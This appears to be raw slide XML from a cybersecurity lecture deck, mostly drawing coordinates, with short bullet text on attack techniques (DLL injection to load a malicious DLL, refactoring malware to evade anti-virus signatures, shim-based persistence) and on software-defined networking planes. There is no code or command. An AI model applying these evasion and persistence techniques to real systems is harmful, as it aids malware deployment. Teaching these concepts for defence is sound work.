                    <a:pt x="197040" y="1052728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1075931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1103325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1134554"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1169289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1207147"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1247813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1290916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1336103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1383030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2895" y="1429969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11353" y="1475155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25019" y="1518259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="43561" y="1558925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="66624" y="1596783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="93840" y="1631518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124891" y="1662747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159410" y="1690141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197040" y="1713344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237451" y="1731987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="280289" y="1745754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325208" y="1754263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="371856" y="1757172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="418490" y="1754263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="463410" y="1745754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="506247" y="1731987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="546658" y="1713344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="584288" y="1690141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="618807" y="1662747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="649859" y="1631518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="677075" y="1596783"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700138" y="1558925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718680" y="1518259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="732345" y="1475155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="740803" y="1429969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="743712" y="1383030"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1858009">
                  <a:moveTo>
                    <a:pt x="2948940" y="374142"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2946031" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937573" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923908" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2905366" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882303" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855087" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824035" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789517" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2751886" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711475" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668638" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623718" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577084" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530437" y="2921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485517" y="11430"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442680" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402268" y="43840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364638" y="67043"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330119" y="94437"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299068" y="125666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271852" y="160401"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248789" y="198259"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230247" y="238925"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216581" y="282028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="327215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205228" y="374142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2208123" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2216581" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2230247" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2248789" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2271852" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2299068" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2330119" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2364638" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2402268" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2442680" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2485517" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530437" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2577084" y="748284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2623718" y="745375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2668638" y="736866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2711475" y="723099"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2751886" y="704456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2789517" y="681253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824035" y="653859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2855087" y="622630"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2882303" y="587895"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2905366" y="550037"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2923908" y="509371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2937573" y="466267"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2946031" y="421081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2948940" y="374142"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="5156200" h="1858009">
                  <a:moveTo>
                    <a:pt x="5155692" y="1483614"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1436687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144300" y="1391500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130597" y="1348397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112016" y="1307731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5088915" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061623" y="1235138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030521" y="1203909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4995926" y="1176515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958219" y="1153312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4917719" y="1134668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4874793" y="1120902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4829797" y="1112393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783074" y="1109472"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4736338" y="1112393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4691342" y="1120902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648416" y="1134668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4607915" y="1153312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4570209" y="1176515"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4535614" y="1203909"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4504512" y="1235138"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4477220" y="1269873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4454118" y="1307731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4435538" y="1348397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4421835" y="1391500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4413351" y="1436687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4410456" y="1483614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4413351" y="1530553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4421835" y="1575739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4435538" y="1618843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4454118" y="1659509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4477220" y="1697367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4504512" y="1732102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4535614" y="1763331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4570209" y="1790725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4607915" y="1813928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4648416" y="1832571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4691342" y="1846338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4736338" y="1854847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4783074" y="1857756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4829797" y="1854847"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4874793" y="1846338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4917719" y="1832571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4958219" y="1813928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4995926" y="1790725"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5030521" y="1763331"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5061623" y="1732102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5088915" y="1697367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5112016" y="1659509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5130597" y="1618843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5144300" y="1575739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5152783" y="1530553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5155692" y="1483614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7931657" y="4893055"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>02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25414" y="5902833"/>
            <a:ext cx="3454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40">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>01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37775" y="6003112"/>
            <a:ext cx="3454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35">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>03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32357" y="5560567"/>
            <a:ext cx="3890010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DLL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jection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fo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ce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pro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cess</a:t>
            </a:r>
            <a:endParaRPr sz="2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load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ma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ious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LL.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15103" y="3399815"/>
            <a:ext cx="7214234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4154" marR="5080" indent="-212090">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Refactoring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condition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where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anti-virus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software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ma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no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onger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identify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mal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w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by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its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ure.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827766" y="5464581"/>
            <a:ext cx="4472305" cy="1173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14100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Shim </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>exploits </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>compatibility </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>framework </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-2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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-11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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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404040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3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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>persist</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-13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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>host.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69128" y="306451"/>
            <a:ext cx="53162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90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Software-Defined</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Networking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1415" y="760476"/>
            <a:ext cx="7415784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50669" y="1882292"/>
            <a:ext cx="13561694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40429" marR="5080" indent="-3427729">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="4133215" algn="l"/>
              </a:tabLst>
            </a:pP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Physical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virtual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appliances	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fully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automated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with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help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scripting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APIs.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this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model,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network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functions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divided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into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three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planes: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99713" y="4317009"/>
            <a:ext cx="1401445" cy="1555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1905">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Control </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-4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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>plane </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-1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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>policy </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>defin</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ti</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-75">
                <a:solidFill>
                  <a:srgbClr val="404040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50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ns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62871" y="3814101"/>
            <a:ext cx="2632710" cy="2611755"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="249364" y="624166"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="216598" y="591781"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190360" y="632548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165823" y="674065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142976" y="716267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121831" y="759129"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102374" y="802589"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84607" y="846582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68529" y="891082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54140" y="936028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41452" y="981379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30454" y="1027074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21145" y="1073073"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13525" y="1119314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7607" y="1165758"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3378" y="1212354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="838" y="1259039"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1305775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="838" y="1352524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3378" y="1399209"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7607" y="1445806"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13525" y="1492250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21145" y="1538490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30454" y="1584490"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41452" y="1630184"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54140" y="1675536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68529" y="1720481"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="84607" y="1764982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102374" y="1808975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="121831" y="1852434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142976" y="1895297"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165823" y="1937499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190360" y="1979015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="216598" y="2019769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="1987384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223342" y="1945551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199123" y="1902955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176695" y="1859686"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156070" y="1815769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137223" y="1771269"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120180" y="1726234"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104940" y="1680718"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91478" y="1634782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79819" y="1588477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69951" y="1541843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61874" y="1494955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55600" y="1447850"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51117" y="1400581"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48425" y="1353210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47523" y="1305788"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48425" y="1258354"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51117" y="1210983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55600" y="1163713"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61874" y="1116609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="69951" y="1069721"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="79819" y="1023086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91478" y="976782"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104940" y="930846"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120180" y="885329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137223" y="840295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156070" y="795794"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176695" y="751878"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199123" y="708609"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="223342" y="666013"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249364" y="624166"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="2632710" h="2611754">
                <a:moveTo>
                  <a:pt x="1084516" y="2372576"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1036269" y="2361082"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="988898" y="2347518"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="942441" y="2331974"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896950" y="2314460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852462" y="2295055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809040" y="2273795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="766737" y="2250744"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725589" y="2225929"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="685673" y="2199424"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="647001" y="2171255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="609663" y="2141486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="573671" y="2110168"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="539115" y="2077351"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506006" y="2043087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="474421" y="2007412"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="444398" y="1970379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="416001" y="1932051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="389255" y="1892465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="364236" y="1851685"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="340982" y="1809737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="319544" y="1766697"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299974" y="1722602"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282321" y="1677504"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="266623" y="1631442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="252958" y="1584477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241363" y="1536661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="202120" y="1536661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="213334" y="1585226"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226593" y="1632940"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="241858" y="1679752"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="259080" y="1725625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="278206" y="1770494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299186" y="1814347"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="321970" y="1857095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="346532" y="1898726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="372808" y="1939175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400735" y="1978393"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="430301" y="2016340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="461429" y="2052955"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="494080" y="2088210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="528205" y="2122043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="563765" y="2154415"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="600710" y="2185276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638975" y="2214588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678535" y="2242274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719328" y="2268321"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761314" y="2292667"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="804443" y="2315260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848664" y="2336050"/>
                </a:lnTo>
